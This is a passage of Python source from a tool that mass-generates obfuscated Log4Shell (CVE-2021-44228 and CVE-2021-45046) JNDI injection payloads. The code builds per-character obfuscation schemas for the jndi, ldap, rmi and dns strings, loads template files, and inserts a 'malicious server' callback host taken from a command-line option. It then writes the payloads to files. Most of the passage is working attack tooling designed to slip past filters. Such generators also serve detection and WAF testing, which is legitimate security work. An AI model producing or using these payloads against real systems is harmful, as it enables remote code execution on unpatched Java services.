    payload template with one randomly chosen obfuscated form of the corresponding character. {{callback_host}} and
    {{random}} are substituted afterwards. After all the substitutions are done, return the specified number of
    obfuscated payloads as a list.
    The placeholder mapping is one of the module-level dicts built at import time further down in this file. Its
    lists must already have been filled by replace_templates_placeholders_with_schema_chars(); random.choice() on a
    still-empty list raises IndexError.
    :param templates: payloads template(CVE-2021-44228 or CVE-2021-45046)
    :param num: number of payloads
    :param is_secondary_obfuscated: boolean
    :return: list of strings, one per generated payload
    """
    selected_template = random.choices(templates, k=num)
    obfuscated_payloads = []

    if is_secondary_obfuscated:
        mapping = mapping_of_placeholders_to_secondary_obfuscated_characters
    else:
        mapping = mapping_of_placeholders_to_primary_obfuscated_characters

    for i in selected_template:
        # `count` only distinguishes the first substitution (taken from the template) from the later ones
        # (taken from the partially substituted payload).
        count = 0
        for key in mapping:
            if count == 0:
                new_payload = i.replace(key, random.choice(mapping[key]))
            else:
                new_payload = new_payload.replace(key, random.choice(mapping[key]))
            count = count + 1
        new_payload = replace_callback_host(new_payload)
        new_payload = replace_random(new_payload)
        obfuscated_payloads.append(new_payload)

    return obfuscated_payloads


def save_payloads(filepath: str, obfuscated_payloads: list[str]) -> None:
    """
    log generated payloads to text files.
    The output directory (the out/CVE-.../ path built by get_filepath_template_num) must already exist: open()
    does not create parent directories. The file is truncated if it exists and is written with the platform
    default encoding.
    :param filepath: string
    :param obfuscated_payloads: list
    """
    with open(filepath, 'w') as f:
        for payload in obfuscated_payloads:
            f.write("%s\n" % payload)
    cprint(f"[INFO] Generated payloads logged to text files under '{filepath}'", "cyan")


def replace_callback_host(payload: str) -> str:
    """
    Replace the {{callback_host}} placeholder in the payload with the malicious server specified by the "-s" option.
    The value of args.server is inserted verbatim -- nothing in this function validates or escapes it. When the
    option is absent or empty the placeholder is left untouched in the returned payload.
    :param payload: payload
    :return: string
    """
    new_payload = payload
    if args.server:
        new_payload = payload.replace("{{callback_host}}", args.server)
    return new_payload


def replace_random(payload: str) -> str:
    """
    Replace the {{random}} placeholder in the payload with an 8-character random string of lowercase ASCII letters.
    :param payload: payload string
    :return: string with every {{random}} occurrence replaced by the same random value
    """
    string_val = "".join(random.choice(string.ascii_lowercase) for i in range(8))
    new_payload = payload.replace("{{random}}", string_val)
    return new_payload


# Module-level state used by the generator, built at import time.
# The leaf lists below (e.g. j_lookup_primary_obfuscated) are shared by reference between the nested schema dict
# (which replace_placeholders_for_lookups_in_template_with_chars_and_append_replaced_lookups_to_list appends to)
# and the flat placeholder mapping read by generate_obfuscated_payloads, so filling one fills the other.
# The hasattr() checks presumably rely on the argument parser suppressing defaults for options that were not
# given on the command line; the parser is defined above this chunk -- confirm there.
if hasattr(args, "number_of_generated_primary_obfuscated_cve_2021_44228_payloads") or\
        hasattr(args, "number_of_generated_primary_obfuscated_cve_2021_45046_payloads") or\
        hasattr(args, "number_of_generated_secondary_obfuscated_cve_2021_44228_payloads") or\
        hasattr(args, "number_of_generated_secondary_obfuscated_cve_2021_45046_payloads"):
    # payloads template (filled by load_payloads_template(), defined outside this chunk)
    cve_2021_44228_obfuscated_payloads_template = []
    cve_2021_45046_obfuscated_payloads_template = []

    if hasattr(args, "number_of_generated_primary_obfuscated_cve_2021_44228_payloads") or\
            hasattr(args, "number_of_generated_primary_obfuscated_cve_2021_45046_payloads"):
        # primary obfuscated templates (filled from primary_obfuscated_template/*.txt by load_obfuscated_template())
        lower_case_primary_obfuscated_templates = []
        upper_case_primary_obfuscated_templates = []
        delimiter_primary_obfuscated_templates = []

        # schema: part -> prefix -> char -> list of obfuscated lookups for that char
        lookups_primary_obfuscated = {}
        delimiter_primary_obfuscated = {}
        proto_primary_obfuscated = {}

        j_lookup_primary_obfuscated = []
        n_lookup_primary_obfuscated = []
        d_lookup_primary_obfuscated = []
        i_lookup_primary_obfuscated = []
        jndi_lookup_primary_obfuscated = {
            "j": j_lookup_primary_obfuscated,
            "n": n_lookup_primary_obfuscated,
            "d": d_lookup_primary_obfuscated,
            "i": i_lookup_primary_obfuscated,
        }
        lookups_primary_obfuscated.update({"jndi": jndi_lookup_primary_obfuscated})

        colon_primary_obfuscated = []
        colon_component_primary_obfuscated = {
            ":": colon_primary_obfuscated
        }
        delimiter_primary_obfuscated.update({"colon_component": colon_component_primary_obfuscated})

        r_proto_primary_obfuscated = []
        m_proto_primary_obfuscated = []
        i_proto_primary_obfuscated = []
        rmi_proto_primary_obfuscated = {
            "r": r_proto_primary_obfuscated,
            "m": m_proto_primary_obfuscated,
            "i": i_proto_primary_obfuscated
        }
        proto_primary_obfuscated.update({"rmi": rmi_proto_primary_obfuscated})

        d_proto_primary_obfuscated = []
        n_proto_primary_obfuscated = []
        s_proto_primary_obfuscated = []
        dns_proto_primary_obfuscated = {
            "d": d_proto_primary_obfuscated,
            "n": n_proto_primary_obfuscated,
            "s": s_proto_primary_obfuscated,
        }
        proto_primary_obfuscated.update({"dns": dns_proto_primary_obfuscated})

        l_proto_primary_obfuscated = []
        a_proto_primary_obfuscated = []
        p_proto_primary_obfuscated = []
        ldap_proto_primary_obfuscated = {
            "l": l_proto_primary_obfuscated,
            "a": a_proto_primary_obfuscated,
            "p": p_proto_primary_obfuscated
        }
        proto_primary_obfuscated.update({"ldap": ldap_proto_primary_obfuscated})

        schema_primary = {
            "lookups": lookups_primary_obfuscated,
            "proto": proto_primary_obfuscated,
            "delimiter": delimiter_primary_obfuscated
        }

        # Placeholder in a payload template -> the same list objects as in schema_primary above.
        mapping_of_placeholders_to_primary_obfuscated_characters = {
            "{{j_lookup}}": j_lookup_primary_obfuscated,
            "{{n_lookup}}": n_lookup_primary_obfuscated,
            "{{d_lookup}}": d_lookup_primary_obfuscated,
            "{{i_lookup}}": i_lookup_primary_obfuscated,
            "{{colon}}": colon_primary_obfuscated,
            "{{r_proto}}": r_proto_primary_obfuscated,
            "{{m_proto}}": m_proto_primary_obfuscated,
            "{{i_proto}}": i_proto_primary_obfuscated,
            "{{d_proto}}": d_proto_primary_obfuscated,
            "{{n_proto}}": n_proto_primary_obfuscated,
            "{{s_proto}}": s_proto_primary_obfuscated,
            "{{l_proto}}": l_proto_primary_obfuscated,
            "{{a_proto}}": a_proto_primary_obfuscated,
            "{{p_proto}}": p_proto_primary_obfuscated
        }

    if hasattr(args, "number_of_generated_secondary_obfuscated_cve_2021_44228_payloads") or\
            hasattr(args, "number_of_generated_secondary_obfuscated_cve_2021_45046_payloads"):
        # secondary obfuscated templates (same layout as the primary block above, separate list objects)
        lower_case_secondary_obfuscated_templates = []
        upper_case_secondary_obfuscated_templates = []
        delimiter_secondary_obfuscated_templates = []

        lookups_secondary_obfuscated = {}
        delimiter_secondary_obfuscated = {}
        proto_secondary_obfuscated = {}

        j_lookup_secondary_obfuscated = []
        n_lookup_secondary_obfuscated = []
        d_lookup_secondary_obfuscated = []
        i_lookup_secondary_obfuscated = []
        jndi_lookup_secondary_obfuscated = {
            "j": j_lookup_secondary_obfuscated,
            "n": n_lookup_secondary_obfuscated,
            "d": d_lookup_secondary_obfuscated,
            "i": i_lookup_secondary_obfuscated,
        }
        lookups_secondary_obfuscated.update({"jndi": jndi_lookup_secondary_obfuscated})

        colon_secondary_obfuscated = []
        colon_component_secondary_obfuscated = {
            ":": colon_secondary_obfuscated
        }
        delimiter_secondary_obfuscated.update({"colon_component": colon_component_secondary_obfuscated})

        r_proto_secondary_obfuscated = []
        m_proto_secondary_obfuscated = []
        i_proto_secondary_obfuscated = []
        rmi_proto_secondary_obfuscated = {
            "r": r_proto_secondary_obfuscated,
            "m": m_proto_secondary_obfuscated,
            "i": i_proto_secondary_obfuscated
        }
        proto_secondary_obfuscated.update({"rmi": rmi_proto_secondary_obfuscated})

        d_proto_secondary_obfuscated = []
        n_proto_secondary_obfuscated = []
        s_proto_secondary_obfuscated = []
        dns_proto_secondary_obfuscated = {
            "d": d_proto_secondary_obfuscated,
            "n": n_proto_secondary_obfuscated,
            "s": s_proto_secondary_obfuscated,
        }
        proto_secondary_obfuscated.update({"dns": dns_proto_secondary_obfuscated})

        l_proto_secondary_obfuscated = []
        a_proto_secondary_obfuscated = []
        p_proto_secondary_obfuscated = []
        ldap_proto_secondary_obfuscated = {
            "l": l_proto_secondary_obfuscated,
            "a": a_proto_secondary_obfuscated,
            "p": p_proto_secondary_obfuscated
        }
        proto_secondary_obfuscated.update({"ldap": ldap_proto_secondary_obfuscated})

        schema_secondary = {
            "lookups": lookups_secondary_obfuscated,
            "proto": proto_secondary_obfuscated,
            "delimiter": delimiter_secondary_obfuscated
        }

        # Placeholder in a payload template -> the same list objects as in schema_secondary above.
        mapping_of_placeholders_to_secondary_obfuscated_characters = {
            "{{j_lookup}}": j_lookup_secondary_obfuscated,
            "{{n_lookup}}": n_lookup_secondary_obfuscated,
            "{{d_lookup}}": d_lookup_secondary_obfuscated,
            "{{i_lookup}}": i_lookup_secondary_obfuscated,
            "{{colon}}": colon_secondary_obfuscated,
            "{{r_proto}}": r_proto_secondary_obfuscated,
            "{{m_proto}}": m_proto_secondary_obfuscated,
            "{{i_proto}}": i_proto_secondary_obfuscated,
            "{{d_proto}}": d_proto_secondary_obfuscated,
            "{{n_proto}}": n_proto_secondary_obfuscated,
            "{{s_proto}}": s_proto_secondary_obfuscated,
            "{{l_proto}}": l_proto_secondary_obfuscated,
            "{{a_proto}}": a_proto_secondary_obfuscated,
            "{{p_proto}}": p_proto_secondary_obfuscated
        }

        # Placeholder-to-character mapping for the prefix of the secondary obfuscation.
        # Applied to the *lookup* templates at load time (see
        # replace_placeholders_for_lookups_in_template_with_chars_and_append_replaced_lookups_to_list), whereas the
        # mapping above is applied to the *payload* templates at generation time. Note that {{j_lookup}},
        # {{n_lookup}}, {{d_lookup}} and {{i_lookup}} are keys in both tables; the two passes run on different
        # template sets, so whether that overlap matters depends on the template files -- verify against them.
        mapping_of_the_secondary_obfuscation_lookup_placeholder_to_character = {
            "{{e_lookup}}": "e",
            "{{r_lookup}}": "r",
            "{{s_lookup}}": "s",
            "{{n_lookup}}": "n",
            "{{p_lookup}}": "p",
            "{{o_lookup}}": "o",
            "{{k_lookup}}": "k",
            "{{m_lookup}}": "m",
            "{{a_lookup}}": "a",
            "{{l_lookup}}": "l",
            "{{w_lookup}}": "w",
            "{{v_lookup}}": "v",
            "{{c_lookup}}": "c",
            "{{t_lookup}}": "t",
            "{{i_lookup}}": "i",
            "{{d_lookup}}": "d",
            "{{g_lookup}}": "g",
            "{{4_lookup}}": "4",
            "{{8_lookup}}": "8",
            "{{x_lookup}}": "x",
            "{{y_lookup}}": "y",
            "{{b_lookup}}": "b",
            "{{j_lookup}}": "j",
            "{{u_lookup}}": "u"
        }


def load_obfuscated_template() -> None:
    """
    Load primary obfuscated or secondary obfuscated template.
    The paths are relative to the current working directory, so the script has to be started from the directory
    that contains the *_obfuscated_template folders. Results are appended to the module-level template lists.
    """
    if hasattr(args, "number_of_generated_primary_obfuscated_cve_2021_44228_payloads") or\
            hasattr(args, "number_of_generated_primary_obfuscated_cve_2021_45046_payloads"):
        read_file_to_list("primary_obfuscated_template/delimiter_obfuscated.txt", delimiter_primary_obfuscated_templates)
        read_file_to_list("primary_obfuscated_template/lower_case_obfuscated.txt", lower_case_primary_obfuscated_templates)
        read_file_to_list("primary_obfuscated_template/upper_case_obfuscated.txt", upper_case_primary_obfuscated_templates)

    if hasattr(args, "number_of_generated_secondary_obfuscated_cve_2021_44228_payloads") or\
            hasattr(args, "number_of_generated_secondary_obfuscated_cve_2021_45046_payloads"):
        read_file_to_list("secondary_obfuscated_template/delimiter_obfuscated.txt", delimiter_secondary_obfuscated_templates)
        read_file_to_list("secondary_obfuscated_template/lower_case_obfuscated.txt", lower_case_secondary_obfuscated_templates)
        read_file_to_list("secondary_obfuscated_template/upper_case_obfuscated.txt", upper_case_secondary_obfuscated_templates)


def replace_templates_placeholders_with_schema_chars(is_secondary_obfuscated: bool) -> None:
    """
    Obfuscate char in schema. If the parameter is_secondary_obfuscated is True, the chars are obfuscated secondary.
    Otherwise, the chars are obfuscated primary.
    Walks every part/prefix/char of the selected schema and fills the char's list in place. Which template set is
    used depends on the part: "lookups" uses both the lower-case and the upper-case templates, "proto" only the
    lower-case templates, and "delimiter" the delimiter templates.
    :param is_secondary_obfuscated: boolean
    """
    if is_secondary_obfuscated:
        schema = schema_secondary
        lower_case_templates = lower_case_secondary_obfuscated_templates
        upper_case_templates = upper_case_secondary_obfuscated_templates
        delimiter_templates = delimiter_secondary_obfuscated_templates
    else:
        schema = schema_primary
        lower_case_templates = lower_case_primary_obfuscated_templates
        upper_case_templates = upper_case_primary_obfuscated_templates
        delimiter_templates = delimiter_primary_obfuscated_templates

    for part in schema:
        for prefix in schema[part]:
            for char in schema[part][prefix]:
                if part == "lookups":
                    replace_placeholders_for_lookups_in_template_with_chars_and_append_replaced_lookups_to_list\
                        (is_secondary_obfuscated, lower_case_templates, part, prefix, char)
                    replace_placeholders_for_lookups_in_template_with_chars_and_append_replaced_lookups_to_list\
                        (is_secondary_obfuscated, upper_case_templates, part, prefix, char)
                if part == "proto":
                    replace_placeholders_for_lookups_in_template_with_chars_and_append_replaced_lookups_to_list\
                        (is_secondary_obfuscated, lower_case_templates, part, prefix, char)
                if part == "delimiter":
                    replace_placeholders_for_lookups_in_template_with_chars_and_append_replaced_lookups_to_list\
                        (is_secondary_obfuscated, delimiter_templates, part, prefix, char)


def replace_placeholders_for_lookups_in_template_with_chars_and_append_replaced_lookups_to_list\
        (is_secondary_obfuscated, templates, part, prefix, char):
    """
    writing obfuscated char into the schema.
    Mutates schema_primary / schema_secondary in place: one entry is appended to schema[part][prefix][char] for every
    template in `templates`. For the secondary variant every placeholder key of
    mapping_of_the_secondary_obfuscation_lookup_placeholder_to_character is additionally substituted, and each
    substitution calls get_lookup_prefix_char_secondary_obfuscated(), which re-reads its template file from disk.
    :param is_secondary_obfuscated: boolean
    :param templates: lowercase, uppercase or delimiter template.
    :param part: lookups, proto, delimiter
    :param prefix: jndi, rmi/dns/ldap, colon_component
    :param char: j/n/d/i, r/m/i/d/n/s/l/a/p, :
    """
    if is_secondary_obfuscated:
        schema = schema_secondary
    else:
        schema = schema_primary
    for lookup_template in templates:
        lookup = substitute_lowercase_uppercase_lookup_variable_main_argument_key(lookup_template, char)
        if is_secondary_obfuscated:
            for key in mapping_of_the_secondary_obfuscation_lookup_placeholder_to_character:
                lookup = lookup.replace\
                    (key, get_lookup_prefix_char_secondary_obfuscated(mapping_of_the_secondary_obfuscation_lookup_placeholder_to_character[key]))
        schema[part][prefix][char].append(lookup)


def get_lookup_prefix_char_secondary_obfuscated(char: str) -> str:
    """
    Replace placeholders for selected unprefixed templates.
    Reads secondary_obfuscated_template/lookup_prefix_char_obfuscated.txt on every call (it is called once per
    placeholder key per lookup template); hoist the read if load time becomes a problem.
    :param char: char
    :return: string
    """
    lookup_prefix_char_secondary_obfuscated_templates = []
    read_file_to_list("secondary_obfuscated_template/lookup_prefix_char_obfuscated.txt",
                      lookup_prefix_char_secondary_obfuscated_templates)
    selected_template = random.choice(lookup_prefix_char_secondary_obfuscated_templates)
    return substitute_lowercase_uppercase_lookup_variable_main_argument_key(selected_template, char)


def substitute_lowercase_uppercase_lookup_variable_main_argument_key(lookup_template: str, char: str) -> str:
    """
    Replace placeholders in obfuscated templates.
    Substitutes {{lowercase}}, {{uppercase}}, {{random_lookup}}, {{random_variable}} and {{main_argument_key}}.
    Each str.replace() call uses a single value for all occurrences of that placeholder in the template.
    :param lookup_template: lookup in obfuscated templates
    :param char: char
    :return: string
    """
    lookup = lookup_template.replace("{{lowercase}}", char.lower())
    lookup = lookup.replace("{{uppercase}}", char.upper())
    lookup = lookup.replace("{{random_lookup}}", get_random_string(get_string_length()))
    lookup = lookup.replace("{{random_variable}}", get_random_string(get_string_length()))
    lookup = lookup.replace("{{main_argument_key}}", get_main_argument_key())
    return lookup


def get_main_argument_key() -> str:
    """
    Get Main Arguments Lookup invalid key in index form.
    :description: According to the definition in the Log4j 2 Lookups manual, the key after the "main:" prefix of the
    Main Arguments Lookup can be either a 0-based index in the argument list, or a string. This method will generate
    a key in invalid index form, causing the Main Arguments Lookup to fail and the default value to be used instead.
    :return: string holding a decimal integer in the range 100..9999 (inclusive)
    """
    return str(random.randint(100, 9999))


def get_string_length() -> int:
    """
    Get the length of the string at random, in the range 4 to 22, as this is the length of most Lookups and variable names.
    :return: int in the range 4..22 (inclusive)
    """
    return random.randint(4, 22)


def get_random_string(length: int) -> str:
    """
    Generates a random string of specified length, including upper and lowercase letters, numbers, and ".".
    This method will be used to generate non-existing lookups and random variable names.
    Uses the `random` module; the values are not secrets, so a CSPRNG is not required here.
    :param length: length of the string
    :return: string
    """
    letters = string.ascii_letters
    digits = string.digits
    dot = '.'
    char_set = letters+digits+dot
    # list(char_set) is redundant (random.choice accepts a str) but harmless.
    result_str = ''.join(random.choice(list(char_set)) for i in range(length))
    return result_str


def read_file_to_list(src_file: str, dst_list: list[str]) -> None:
    """
    Read file contents into a list.
    Each line is stripped of surrounding whitespace; empty lines and lines starting with "#" are skipped.
    The file is opened with the platform default encoding and read entirely into memory.
    :param src_file: Source File
    :param dst_list: destination list, appended to in place
    """
    with open(src_file, 'r') as f:
        for item in f.readlines():
            item = item.strip()
            if item == "" or item.startswith("#"):
                continue
            dst_list.append(item)


def main() -> None:
    """
    Entry point: load the templates, fill the schemas, then generate and save one payload file per requested option.
    Relies on the module-level `args` namespace; every attribute of it is passed through get_filepath_template_num(),
    which yields a None filepath for attributes that are not generation options, and those are skipped.
    """
    print_banner()
    print_help_msg()
    if hasattr(args, "number_of_generated_primary_obfuscated_cve_2021_44228_payloads") or \
            hasattr(args, "number_of_generated_primary_obfuscated_cve_2021_45046_payloads") or \
            hasattr(args, "number_of_generated_secondary_obfuscated_cve_2021_44228_payloads") or \
            hasattr(args, "number_of_generated_secondary_obfuscated_cve_2021_45046_payloads"):
        load_obfuscated_template()
        load_payloads_template()
        if hasattr(args, "number_of_generated_primary_obfuscated_cve_2021_44228_payloads") or\
                hasattr(args, "number_of_generated_primary_obfuscated_cve_2021_45046_payloads"):
            replace_templates_placeholders_with_schema_chars(False)
        if hasattr(args, "number_of_generated_secondary_obfuscated_cve_2021_44228_payloads") or \
                hasattr(args, "number_of_generated_secondary_obfuscated_cve_2021_45046_payloads"):
            replace_templates_placeholders_with_schema_chars(True)
        for option in vars(args).keys():
            is_secondary_obfuscated = False
            if option == "number_of_generated_secondary_obfuscated_cve_2021_44228_payloads" or\
                    option == "number_of_generated_secondary_obfuscated_cve_2021_45046_payloads":
                is_secondary_obfuscated = True
            info = get_filepath_template_num(option)
            if info[0] is not None:
                filepath = info[0]
                templates = info[1]
                num = info[2]
                obfuscated_payloads = generate_obfuscated_payloads(templates, num, is_secondary_obfuscated)
                save_payloads(filepath, obfuscated_payloads)


if __name__ == '__main__':
    main()